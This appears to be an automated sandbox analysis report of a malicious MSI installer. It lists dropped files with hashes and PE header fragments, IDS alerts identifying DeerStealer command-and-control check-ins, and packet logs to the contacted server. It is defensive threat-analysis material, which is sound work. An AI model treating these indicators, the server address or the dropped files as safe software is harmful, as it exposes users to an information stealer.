                                                                                                SHA-512:54C54787A4CA8643271169BE403069BC5F1E319A55D6A0EBD84FB0D96F6E9BDDC52B0908541D29DB04A042B531ABD6C05073E27B0B2753196E0055B8B8200B09
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2012160
                                                                                                Entropy (8bit):6.677286319553433
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:L2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6T:LRSf0Ww+NpPSyzYY8c8YEPI4+T
                                                                                                MD5:849070EBD34CBAEDC525599D6C3F8914
                                                                                                SHA1:B0543D13F4D0CB787ABDAAF1D3C9A5AF17C87AFA
                                                                                                SHA-256:B6F321A48812DC922B26953020C9A60949EC429A921033CFAF1E9F7D088EE628
                                                                                                SHA-512:F2CA685B01BE9D1B77D8D924E0097DDACEE7628CC1AAD8A87D8B18A699558D38A7851E6CFF8BB2B8AE1980824588AF5C3AC75B7B4198B620144DFF61611F3AEB
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H.....................l............... .....P.................................e...............................P...'...`.......................t...@.......^.............."....................................y...............................text...4........................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata...'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225792
                                                                                                Entropy (8bit):6.542140301791508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:F4af8kXL6nX0YXjvkWQ5vYhbNkWPFOEJ8YZbjeTl0Y25zFgYBzRKy6sB65avEtAt:Oaf8kLWL7Xov8bNxdOmrfgYmHA6I
                                                                                                MD5:7DAA2B7FE529B45101A399B5EBF0A416
                                                                                                SHA1:FD73F3561D0CEBE341A6C380681FB08841FA5CE6
                                                                                                SHA-256:2BDF023C439010CE0A786EC75D943A80A8F01363712BBF69AFC29D3E2B5306ED
                                                                                                SHA-512:8E9EC71943C412FE95563E488D91E6EF0041C16A08654FF14B11953F134007657D1E6EC95952F6B9C8B8567A35368840618DB06E5CD99ABC43AE495A3FBC6B96
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H..........................................1P.................................T...................................|......&....P...>...........2...@... ...!..............!................................... ................................text...8........................... ..`.itext.............................. ..`.data...P...........................@....bss....<................................idata..&...........................@....edata...|.......~...R..............@..@.rdata..!...........................@..@.reloc...!... ..."..................@..B.rsrc....>...P...>..................@..@.....................2..............@..@................................................................................................
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Gratin, Author: Hurdle Stithy, Keywords: Installer, Comments: This installer database contains the logic and data required to install Gratin., Template: Intel;1033, Revision Number: {F8287FD5-FF2A-4270-84E3-45317986F30E}, Create Time/Date: Tue Nov 19 09:48:28 2024, Last Saved Time/Date: Tue Nov 19 09:48:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                Category:dropped
                                                                                                Size (bytes):6766592
                                                                                                Entropy (8bit):7.9984911338080185
                                                                                                Encrypted:true
                                                                                                SSDEEP:196608:0I1luWmYjbL+43RSnJaVBKQiEh4i4gO3MR26f:9pLbL+4tli+4hGJ
                                                                                                MD5:829E5E01899CAC6E4326893AFBF5BE82
                                                                                                SHA1:DA638840F3452D74B9118D6C60A5A6CF70B87901
                                                                                                SHA-256:84ABC28B1DA1C2DDF01072FB2817EB446933BA98ECC0DB2228281D6FCFADFF0C
                                                                                                SHA-512:212A35971A38F2800E876882A03E610C074B4918509D06D4A25E9CDEBB1049E7A91BD7E659706914A9584F79943C94CA68F0F3BE7ACF84E056F3910C717C4F03
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Gratin, Author: Hurdle Stithy, Keywords: Installer, Comments: This installer database contains the logic and data required to install Gratin., Template: Intel;1033, Revision Number: {F8287FD5-FF2A-4270-84E3-45317986F30E}, Create Time/Date: Tue Nov 19 09:48:28 2024, Last Saved Time/Date: Tue Nov 19 09:48:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                Category:dropped
                                                                                                Size (bytes):6766592
                                                                                                Entropy (8bit):7.9984911338080185
                                                                                                Encrypted:true
                                                                                                SSDEEP:196608:0I1luWmYjbL+43RSnJaVBKQiEh4i4gO3MR26f:9pLbL+4tli+4hGJ
                                                                                                MD5:829E5E01899CAC6E4326893AFBF5BE82
                                                                                                SHA1:DA638840F3452D74B9118D6C60A5A6CF70B87901
                                                                                                SHA-256:84ABC28B1DA1C2DDF01072FB2817EB446933BA98ECC0DB2228281D6FCFADFF0C
                                                                                                SHA-512:212A35971A38F2800E876882A03E610C074B4918509D06D4A25E9CDEBB1049E7A91BD7E659706914A9584F79943C94CA68F0F3BE7ACF84E056F3910C717C4F03
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4332
                                                                                                Entropy (8bit):5.6234257649405
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:q59QDOrkss4VsSsgDMZy0L+IfjXceYUae6WMThQqfEPnt:qznrksJV1PwZy0CIfjMe8e6/JWnt
                                                                                                MD5:BFD4A5681A5634DBFEB7B6A0E050A339
                                                                                                SHA1:BA3866E7E6D744DBE39283E9F1C7CA07CBAE9B61
                                                                                                SHA-256:931E895E5B89C1D4AD0D096FAC5C8B65A70195CB6E3720578CF65F8D27870569
                                                                                                SHA-512:096BBA70AB0FA014A6D2B5E8760338A7D7BF593C3DD209255F15C4467C2ACF885A605DA37CF8D0A291F524E3316C31970861833A2FA46919D49F503D358C9485
                                                                                                Malicious:false
                                                                                                Preview:...@IXOS.@.....@..}Y.@.....@.....@.....@.....@.....@......&.{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}..Gratin..ONHQNHFT.msi.@.....@.....@.....@........&.{F8287FD5-FF2A-4270-84E3-45317986F30E}.....@.....@.....@.....@.......@.....@.....@.......@......Gratin......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E20E89CA-95F6-5DEE-87C2-2010D7F7BD02}2.C:\Users\user\AppData\Local\Temp\Aplanogamete\hso.@.......@.....@.....@......&.{C563E190-FFF5-5EB2-96EE-2ABF7AD28F4C}<.C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dll.@.......@.....@.....@......&.{61B0744F-3BCA-52D6-B8E9-FDAED81FE5E3}<.C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe.@.......@.....@.....@......&.{2686B041-402A-53FD-9258-4FE6A6C3E662}<.C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bpl.@.......@.....@.....@......&.{95C0C730-48E2-51E1-AD09-926C08DAB44F}=.C:\Users\j
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.162988613293476
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:JSbX72FjVSAGiLIlHVRpfh/7777777777777777777777777vDHF8hZn9B/2utpQ:JCQI5b6j9B/2KF
                                                                                                MD5:50CF505177521B172A04CF24FD2851A1
                                                                                                SHA1:61C764170F82EC6BD526FC68A92AC944B4FC538D
                                                                                                SHA-256:CA9160522E8E44AAACDD3A814CE696323D6145C7FBDBA7F77FEE79C1A6B09D40
                                                                                                SHA-512:03BF1A6C8625E8825AE065AA6088709F08D515C4124B1F3A39C3C7917D58CB7554067E516DDEDC2CF45BE66DEF0DF13F53D0A3258AF34EADA5F675495297F38A
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.4782534290536051
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:T8Ph2uRc06WXJ4nT54SHRfwA9US5o0rw9USIMk:6h21bnTysRfq6g
                                                                                                MD5:4F94EF5150D04F16193EE65B00595965
                                                                                                SHA1:85B1264076869C29E889A9EB6CDF683AB7A58080
                                                                                                SHA-256:EC05CF36C7F2370AC1600978796A94A6B9CD730D385DBE4487C6A68EA4C4715B
                                                                                                SHA-512:E732F41DAB5567D1876FCEAF5F6CFAB4B4109AB557E09E5A899FE94C54E7AC1020C63E1C0B4528E5F14474AB67553D944AB3355CAA591007AB568770674315DA
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):432221
                                                                                                Entropy (8bit):5.375189182929696
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpErS
                                                                                                MD5:C6B6E6547826E8316EE5E5786468D635
                                                                                                SHA1:6AC5AF6A16A93EE4AD8CA9FD3EC3586536A936E4
                                                                                                SHA-256:6F0BAEE14848F93132CF5E1C9CAE9F8BED24898A454C836AD29585F040AD0F07
                                                                                                SHA-512:F1DBEEEE7FD697F038E5FEE81249B1541C418BA5253C2A2A81E71318BA39C17FCECD946CE45A56CA5EC1125F9D430618349DD98F900A0EABCBE30DB8C2AA7BA1
                                                                                                Malicious:false
                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):0.07056880036279622
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO8XhZntrB/wbIh4Vky6lw:2F0i8n0itFzDHF8hZn9B/Xw
                                                                                                MD5:EF1E213DF84FF32A73BC36C16915EBDE
                                                                                                SHA1:167646A923F6DFCF80CFFC8A521C868D6605450E
                                                                                                SHA-256:06D3D8D0DFAE46262873FE37A0A2203BE99E899DD50BC95530C777CFB0FFB0D4
                                                                                                SHA-512:F90FBD19761D494ED9EEAB2AE1C086F0D834C29F1760B2D4057FF5E9653E82242907A5C66B63BBAFB3476E5518FD5D5A8755679E65DCF3B40BB9C2090DBE96E8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.4782534290536051
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:T8Ph2uRc06WXJ4nT54SHRfwA9US5o0rw9USIMk:6h21bnTysRfq6g
                                                                                                MD5:4F94EF5150D04F16193EE65B00595965
                                                                                                SHA1:85B1264076869C29E889A9EB6CDF683AB7A58080
                                                                                                SHA-256:EC05CF36C7F2370AC1600978796A94A6B9CD730D385DBE4487C6A68EA4C4715B
                                                                                                SHA-512:E732F41DAB5567D1876FCEAF5F6CFAB4B4109AB557E09E5A899FE94C54E7AC1020C63E1C0B4528E5F14474AB67553D944AB3355CAA591007AB568770674315DA
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):1.1901527595610124
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8heuBNveFXJfT5WSHRfwA9US5o0rw9USIMk:Eex3TssRfq6g
                                                                                                MD5:63F905A953F2D8434EDE74D75F1EC5D8
                                                                                                SHA1:62BA59E7864065A9563BE0DA12E346415A0D3015
                                                                                                SHA-256:4667322A1393AC2B38BFCA21996B116AC2733E18FFD7020B65DEB1202F5ED236
                                                                                                SHA-512:122536C8D090F6F1D8702D82A9E0296F004C95CBC8F53F26A6B2E8E2AC2BB116419B99E3BA830B0C9283659917868A6A8C6BE7B45E1F78087E28532B3513FA5D
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):1.4782534290536051
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:T8Ph2uRc06WXJ4nT54SHRfwA9US5o0rw9USIMk:6h21bnTysRfq6g
                                                                                                MD5:4F94EF5150D04F16193EE65B00595965
                                                                                                SHA1:85B1264076869C29E889A9EB6CDF683AB7A58080
                                                                                                SHA-256:EC05CF36C7F2370AC1600978796A94A6B9CD730D385DBE4487C6A68EA4C4715B
                                                                                                SHA-512:E732F41DAB5567D1876FCEAF5F6CFAB4B4109AB557E09E5A899FE94C54E7AC1020C63E1C0B4528E5F14474AB67553D944AB3355CAA591007AB568770674315DA
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):512
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3::
                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):1.1901527595610124
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8heuBNveFXJfT5WSHRfwA9US5o0rw9USIMk:Eex3TssRfq6g
                                                                                                MD5:63F905A953F2D8434EDE74D75F1EC5D8
                                                                                                SHA1:62BA59E7864065A9563BE0DA12E346415A0D3015
                                                                                                SHA-256:4667322A1393AC2B38BFCA21996B116AC2733E18FFD7020B65DEB1202F5ED236
                                                                                                SHA-512:122536C8D090F6F1D8702D82A9E0296F004C95CBC8F53F26A6B2E8E2AC2BB116419B99E3BA830B0C9283659917868A6A8C6BE7B45E1F78087E28532B3513FA5D
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):0.1093475308907446
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wTHMkh92xipVM92xipV7V2BwGilrkgKwF+UH2c:uMkh9USK9US5o0rKwFZH2
                                                                                                MD5:CDF4CAA8A01C7FC178FC9E5FA84989CF
                                                                                                SHA1:2D51723B8760A98167FB1953C6B8095D39724794
                                                                                                SHA-256:94DC82765E08A7F1A32615BC23DC119F11AED0E223F72E441F075F6C5D40A6D9
                                                                                                SHA-512:5DDE86AC266FCE84996D5CA4AF8FC7E62E2AE3487556AC5CE5E6243A39710228F8DC8CEEF6033B8152DD48CBECE7E0DD2E7E0010127026B19CD18816FF276123
                                                                                                Malicious:false
                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Gratin, Author: Hurdle Stithy, Keywords: Installer, Comments: This installer database contains the logic and data required to install Gratin., Template: Intel;1033, Revision Number: {F8287FD5-FF2A-4270-84E3-45317986F30E}, Create Time/Date: Tue Nov 19 09:48:28 2024, Last Saved Time/Date: Tue Nov 19 09:48:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                Entropy (8bit):7.9984911338080185
                                                                                                TrID:
                                                                                                • Microsoft Windows Installer (60509/1) 88.31%
                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 11.69%
                                                                                                File name:ONHQNHFT.msi
                                                                                                File size:6'766'592 bytes
                                                                                                MD5:829e5e01899cac6e4326893afbf5be82
                                                                                                SHA1:da638840f3452d74b9118d6c60a5a6cf70b87901
                                                                                                SHA256:84abc28b1da1c2ddf01072fb2817eb446933ba98ecc0db2228281d6fcfadff0c
                                                                                                SHA512:212a35971a38f2800e876882a03e610c074b4918509d06d4a25e9cdebb1049e7a91bd7e659706914a9584f79943c94ca68f0f3be7acf84e056f3910c717c4f03
                                                                                                SSDEEP:196608:0I1luWmYjbL+43RSnJaVBKQiEh4i4gO3MR26f:9pLbL+4tli+4hGJ
                                                                                                TLSH:D1663368F9B29178C7DF06326A333586851ACC5DC25AA1236396F78E24733379DBC05E
                                                                                                Icon Hash:2d2e3797b32b2b99
Timestamp                        SID      Signature                                                  Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-11-30T02:25:12.480061+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49766        172.67.141.133  443        TCP
2024-11-30T02:25:13.319327+0100  2056550  ET MALWARE Win32/DeerStealer CnC Checkin                   1         192.168.2.4  49766        172.67.141.133  443        TCP
2024-11-30T02:25:14.994029+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49772        172.67.141.133  443        TCP
2024-11-30T02:25:17.012217+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49777        172.67.141.133  443        TCP
2024-11-30T02:25:20.232067+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49782        172.67.141.133  443        TCP
2024-11-30T02:25:22.751443+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49787        172.67.141.133  443        TCP
2024-11-30T02:25:24.669971+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49792        172.67.141.133  443        TCP
2024-11-30T02:25:26.739226+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49797        172.67.141.133  443        TCP
2024-11-30T02:25:28.673993+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49803        172.67.141.133  443        TCP
2024-11-30T02:25:31.106397+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49809        172.67.141.133  443        TCP
2024-11-30T02:25:33.734459+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49815        172.67.141.133  443        TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                Nov 30, 2024 02:25:13.532593012 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.532601118 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.532860994 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.540205002 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.548119068 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.548197031 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.548204899 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.555967093 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.556045055 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.556051970 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.563755035 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.563797951 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.563805103 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.571578979 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.571650028 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.571656942 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.586267948 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.586323977 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.586332083 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.593259096 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.593326092 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.593333006 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600269079 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600302935 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600337029 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.600344896 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.600553036 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.644371033 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721599102 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721683979 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721709013 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.721724987 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.721790075 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.723961115 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.724119902 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.724188089 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.724195957 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.735125065 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.735184908 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.735193968 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.735306025 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.739963055 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.739970922 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.740062952 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.740067005 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.740204096 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.740314960 CET49766443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.740331888 CET44349766172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.777091980 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.777108908 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:13.777179956 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.777493000 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:13.777503967 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.993879080 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.994029045 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:14.997481108 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:14.997487068 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.997725964 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:14.999955893 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:14.999984026 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.000030994 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.667329073 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.667426109 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.668067932 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.668251991 CET49772443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.668256044 CET44349772172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.731861115 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.731909990 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:15.732047081 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.732671976 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:15.732686043 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.012135029 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.012217045 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.013500929 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.013514042 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.013741016 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.017827988 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.017846107 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.017853975 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.681955099 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.682070971 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.682209015 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.682238102 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:17.682249069 CET49777443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:17.682255030 CET44349777172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:19.017501116 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:19.017538071 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:19.017637014 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:19.018151999 CET49782443192.168.2.4172.67.141.133
